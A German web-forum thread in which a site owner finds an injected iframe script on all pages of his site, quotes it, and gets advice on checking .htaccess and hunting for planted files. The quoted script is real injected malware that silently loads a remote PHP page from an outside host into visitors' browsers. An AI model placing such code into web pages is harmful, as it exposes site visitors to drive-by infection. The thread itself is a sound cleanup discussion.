malware iframe unter dem abschließenden html tag

  • habe einen iframe durch zufall entdeckt, der sich auf allen seiten eingenistet hat. Frage mich nun, wie ich den weg bekomme. Code(in der html Ausgabe) sieht so aus:

    Code
    <script type="text/javascript" language="javascript" >                                                                     (function () {    var id = '6';    var vncqc09 = document.createElement('iframe');    
    vncqc09.src = 'http://arealroku.cz/dtd.php';    vncqc09.style.position = 'absolute';    
    vncqc09.style.border = '1';    vncqc09.style.height = '31px';    vncqc09.style.width = '42px';    
    vncqc09.style.left = '500px';    vncqc09.style.top = '100px';    
    if (!document.getElementById('vncqc')) 
    {        document.write('<style>body{overflow-x:hidden;}</style>');
    document.write('<div id=\'vncqc\' style="position:absolute; width:80%; height:100%;" ></div>');        document.getElementById('vncqc').appendChild(vncqc09);    }})();
    </script>

    Kommt einem von Euch das Teil bekannt vor? Hatte jemand schon mal ein ähnliches Problem und dafür nen Lösungsansatz?

    Derzeit ist er nicht wirklich aktiv, weder AVG noch Avira noch Malwarebytes melden sich, daher gebe ich den Link zu Seite hier mit rein (hoffe, ich werde dafür nicht verbal gesteinigt):
    http://www.ahlswede.eu

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Bitte prüfe auch die .htaccess Datei und prüfe auch, ob noch weitere Dateien angelegt wurden, die in einer Standardinstallation nicht vorhanden sind. Dieses dtd.php habe ich hier im Forum erst kürzlich noch gesehen. Da war scheinbar auch ein Redirect in der .htaccess untergebracht.

  • Das"wo ist er hegekommen?" würde ich auch gerne rauskriegen... keine Ahnung. Die .htaccess hat den folgenden Inhalt:


    Also Standard. Habe heute einen neuen User angelegt, dem alten User ein extrem schwieriges Passwort gegeben. Mal sehen, ob das hilft. Wie kann ich prüfen, ob da neue Dateien dazu gekommen sind? Die Scheiss-Dateien sind zu 99,9% hidden....

  • Zitat

    Wie kann ich prüfen, ob da neue Dateien dazu gekommen sind?

    Meistens wird mind. eine Datei im Rootverzeichnis abgelegt, die dort nichts zu suchen hat. Die 3 Hauptverzeichnisse könnten ebenfalls neue Dateien enthalten. Hier hilft eigentlich nur ein mühevolles durchforsten der Verzeichnisse. Wobei es auch Tools gibt, die die Differenzen zwischen 2 Verzeichnissen ausfindig machen können (z.B. FreeCommander für Win)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!